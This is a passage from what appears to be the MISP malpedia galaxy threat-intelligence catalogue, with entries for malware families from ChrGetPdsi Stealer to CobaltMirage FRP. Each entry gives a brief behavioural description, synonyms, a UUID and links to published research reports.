- https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension - webarchive
- https://cybergeeks.tech/chromeloader-browser-hijacker - webarchive
- https://www.connectwise.com/blog/threat-report/smash-jacker - webarchive
- https://redcanary.com/blog/chromeloader/ - webarchive
- https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER - webarchive
- https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChrGetPdsi Stealer
ChrGetPdsi is a basic infostealer written in Golang which is designed to steal browser history and logins, and targets Chrome, Edge, and Firefox. The output is written to a text file named chrgetpdsi.txt. Based on the samples analysed, the malware does not appear to have networking capabilities, and therefore it is likely that it is intended to be used in a post-compromise situation where the attacker already has access to the target system and can retrieve the created output file via other means. ChrGetPdsi has been observed being deployed by the Broomstick malware.
Internal MISP references
UUID 3cc84a6b-4706-4ada-9355-7c945bb0eb4f
which can be used as unique global reference for ChrGetPdsi Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chrgetpdsi_stealer - webarchive
- https://exchange.xforce.ibmcloud.com/malware-analysis/guid:2f96dded08ec1c2dd039fca21378050c - webarchive
- https://www.rapid7.com/blog/post/2024/06/17/malvertising-campaign-leads-to-execution-of-oyster-backdoor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chthonic
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chthonic.
Known Synonyms |
---|
AndroKINS |
Internal MISP references
UUID 9441a589-e23d-402d-9603-5e55e3e33971
which can be used as unique global reference for Chthonic
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic - webarchive
- https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan - webarchive
- https://securelist.com/chthonic-a-new-modification-of-zeus/68176/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
cifty
Internal MISP references
UUID 8a1af36b-b8e1-4e05-ac42-c2866ffba031
which can be used as unique global reference for cifty
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cinobi
Internal MISP references
UUID d0f0f754-fe9b-45bd-a9d2-c6110c807af4
which can be used as unique global reference for Cinobi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi - webarchive
- https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf - webarchive
- http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/ - webarchive
- https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cinoshi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cinoshi.
Known Synonyms |
---|
Agniane |
Internal MISP references
UUID 65f75ea8-c06b-4d8d-b757-e992966667b5
which can be used as unique global reference for Cinoshi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cinoshi - webarchive
- https://cyble.com/blog/cinoshi-project-and-the-dark-side-of-free-maas/ - webarchive
- https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat - webarchive
- https://twitter.com/suyog41/status/1633807752127475713?s=20 - webarchive
- https://www.youtube.com/watch?v=-KJ0HIvmVl0 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Citadel
Internal MISP references
UUID 7f550cae-98b7-4a0c-bed2-d79227dc6310
which can be used as unique global reference for Citadel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel - webarchive
- https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/ - webarchive
- https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals - webarchive
- http://www.xylibox.com/2016/02/citadel-0011-atmos.html - webarchive
- http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clambling
Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.
Internal MISP references
UUID 783c8192-d00d-446c-bf06-0ce0cb4bc2c2
which can be used as unique global reference for Clambling
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/ - webarchive
- https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CLASSFON
Internal MISP references
UUID c433e0f1-760c-41e6-bb62-13eaf7bbf1f4
which can be used as unique global reference for CLASSFON
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CLEANTOAD
CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.
Internal MISP references
UUID c0417767-5b98-43b0-b9e7-e43dc7f53c6a
which can be used as unique global reference for CLEANTOAD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Client Maximus
Internal MISP references
UUID c2bd0771-55d6-4242-986d-4bfd735998ba
which can be used as unique global reference for Client Maximus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ClipBanker
The ClipBanker Trojan is known as an information stealer and spy trojan; it aims to steal and record any type of sensitive information from the infected environment, such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. ClipBanker uses PowerShell commands to execute its malicious activities. What makes ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. ClipBanker is distributed through phishing emails or through social media posts that lure users into downloading malicious content.
Internal MISP references
UUID 5d6a9b59-96b1-4bc4-824d-ffe208b99462
which can be used as unique global reference for ClipBanker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker - webarchive
- https://asec.ahnlab.com/en/35981/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/ - webarchive
- https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf - webarchive
- https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clipog
A keylogger.
Internal MISP references
UUID 0cc6c7a8-9484-4017-97ac-2fd5594f27f8
which can be used as unique global reference for Clipog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clop (Windows)
Clop is a ransomware which appends the .clop extension to the victim's files after encrypting them. Another characteristic unique to Clop is the string "Dont Worry C|0P" included in its ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove Microsoft Security Essentials in order to avoid user-space detection.
Internal MISP references
UUID 8071f2d8-cc44-4682-845b-6f39a9f8b587
which can be used as unique global reference for Clop (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.clop - webarchive
- https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824 - webarchive
- https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/ - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://asec.ahnlab.com/en/19542/ - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf - webarchive
- https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://twitter.com/darb0ng/status/1338692764121251840 - webarchive
- https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities - webarchive
- https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/ - webarchive
- https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/ - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/ - webarchive
- https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/ - webarchive
- https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html - webarchive
- https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://unit42.paloaltonetworks.com/clop-ransomware/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/ - webarchive
- https://nattothoughts.substack.com/p/ransom-war-russian-extortion-operations - webarchive
- https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/ - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://fourcore.io/blogs/clop-ransomware-history-adversary-simulation - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/ - webarchive
- https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e - webarchive
- https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546 - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html - webarchive
- https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf - webarchive
- https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/ - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://github.com/Tera0017/TAFOF-Unpacker - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2 - webarchive
- https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/ - webarchive
- https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104 - webarchive
- https://www.youtube.com/watch?v=PqGaZgepNTE - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md - webarchive
- https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/ - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/ - webarchive
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop - webarchive
- https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26 - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html - webarchive
- https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CLOUDBURST
CLOUDBURST aka NickelLoader is an HTTP(S) downloader.
It recognizes a set of four basic commands, all five letters long, like abcde, avdrq, gabnc and dcrqv (alternatively: eknag, eacec, hjmwk, wohnp). The most important functionality is to load a received buffer, either as a DLL via the MemoryModule implementation, or as a shellcode.
It uses AES for encryption and decryption of network traffic. It usually sends the following information back to its C&C server: computer name, product name and the list of running processes. Typically, it uses two hardcoded parameter names for its initial HTTP POST requests: gametype and type (alternatively: type and code).
The CLOUDBURST payload is disguised as mscoree.dll and is side-loaded via a legitimate Windows binary PresentationHost.exe with the argument -embeddingObject. It comes either as a trojanized plugin project for Notepad++ (usually FingerText by erinata), or as a standalone DLL loaded by a dropper, which is a trojanized plugin project as well (usually NppyPlugin by Jari Pennanen).
The CLOUDBURST malware was used in Operation DreamJob attacks against an aerospace company and a network running Microsoft Intune software in Q2-Q3 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CLOUDBURST.
Known Synonyms |
---|
NickelLoader |
Internal MISP references
UUID 3f320960-77a2-4525-8d19-95b6028ec0d5
which can be used as unique global reference for CLOUDBURST
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - webarchive
- https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ - webarchive
- https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudEyE
CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudEyE.
Known Synonyms |
---|
GuLoader |
vbdropper |
Internal MISP references
UUID 966f54ae-1781-4f2e-8b32-57a242a00bb9
which can be used as unique global reference for CloudEyE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye - webarchive
- https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/ - webarchive
- https://twitter.com/sysopfb/status/1258809373159305216 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services - webarchive
- https://labs.vipre.com/unloading-the-guloader/ - webarchive
- https://twitter.com/VK_Intel/status/1255537954304524288 - webarchive
- https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877 - webarchive
- https://blog.vincss.net/vi/re014-guloader-antivm-techniques/ - webarchive
- https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 - webarchive
- https://blog.morphisec.com/guloader-the-rat-downloader - webarchive
- https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update - webarchive
- https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/ - webarchive
- https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader - webarchive
- https://www.youtube.com/watch?v=N0wAh26wShE - webarchive
- https://malwation.com/malware-config-extraction-diaries-1-guloader/ - webarchive
- https://asec.ahnlab.com/en/55978/ - webarchive
- https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/ - webarchive
- https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/ - webarchive
- https://twitter.com/TheEnergyStory/status/1240608893610459138 - webarchive
- https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa - webarchive
- https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans - webarchive
- https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4 - webarchive
- https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/ - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland - webarchive
- https://www.joesecurity.org/blog/3535317197858305930 - webarchive
- https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/ - webarchive
- https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ - webarchive
- https://labs.k7computing.com/?p=20156 - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/ - webarchive
- https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/ - webarchive
- https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/ - webarchive
- https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/ - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://twitter.com/VK_Intel/status/1252678206852907011 - webarchive
- https://www.crowdstrike.com/blog/guloader-malware-analysis/ - webarchive
- https://www.youtube.com/watch?v=gk7fCC5RiAQ - webarchive
- https://labs.k7computing.com/?p=21725Lokesh - webarchive
- https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf - webarchive
- https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/ - webarchive
- https://sansorg.egnyte.com/dl/ALlvwK6fp0 - webarchive
- https://www.youtube.com/watch?v=K3Yxu_9OUxU - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html - webarchive
- https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728 - webarchive
- https://any.run/cybersecurity-blog/deobfuscating-guloader/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://research.checkpoint.com/2020/guloader-cloudeye/ - webarchive
- https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/ - webarchive
- https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/ - webarchive
- https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/ - webarchive
- https://twitter.com/VK_Intel/status/1257206565146370050 - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader - webarchive
- https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two - webarchive
- https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195 - webarchive
- https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/ - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://malwarebookreports.com/guloader-navigating-a-maze-of-intricacy/ - webarchive
- https://twitter.com/TheEnergyStory/status/1239110192060608513 - webarchive
- https://youtu.be/Lt07O3XSNJQ - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/ - webarchive
- https://www.youtube.com/watch?v=-FxyzuRv6Wg - webarchive
- https://cyberint.com/blog/other/guloader-downloaded-a-look-at-the-latest-iteration/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudWizard
Internal MISP references
UUID 4d941367-b22e-4d01-930e-c757b58eff58
which can be used as unique global reference for CloudWizard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudDuke
F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudDuke.
Known Synonyms |
---|
CloudLook |
MiniDionis |
Internal MISP references
UUID 40baac36-2fd0-49b3-b05b-1087d60f4f2c
which can be used as unique global reference for CloudDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudScout
According to ESET Research, CloudScout is a toolset that is capable of retrieving data from various cloud services by leveraging stolen web session cookies. Through a plugin, CloudScout works seamlessly with MgBot, Evasive Panda's signature malware framework.
Internal MISP references
UUID 76abb504-a218-444f-a5ce-8921e10c4a4e
which can be used as unique global reference for CloudScout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
cmoon
Internal MISP references
UUID 0f5a7988-bf8c-4bdc-a4db-782bba424999
which can be used as unique global reference for cmoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CMSBrute
Internal MISP references
UUID ad960c5c-f2a1-405e-a32a-31f75b7c6859
which can be used as unique global reference for CMSBrute
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CMSTAR
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CMSTAR.
Known Synonyms |
---|
meciv |
Internal MISP references
UUID e4e15ab4-9ba6-444a-b154-2854757e792e
which can be used as unique global reference for CMSTAR
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar - webarchive
- https://twitter.com/ClearskySec/status/963829930776723461 - webarchive
- https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CoalaBot
Internal MISP references
UUID 7acd9a27-f550-4c47-9fc8-429b61b04217
which can be used as unique global reference for CoalaBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CobaltMirage FRP
This Go-written malware was observed during a COBALT MIRAGE campaign; it bundles FRP (Fast Reverse Proxy), published by fatedier on GitHub (https://github.com/fatedier/frp), together with other open-source projects.
Internal MISP references
UUID a9bebdbf-24b3-40e0-9596-2adf60c3abf8
which can be used as unique global reference for CobaltMirage FRP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cobalt Strike
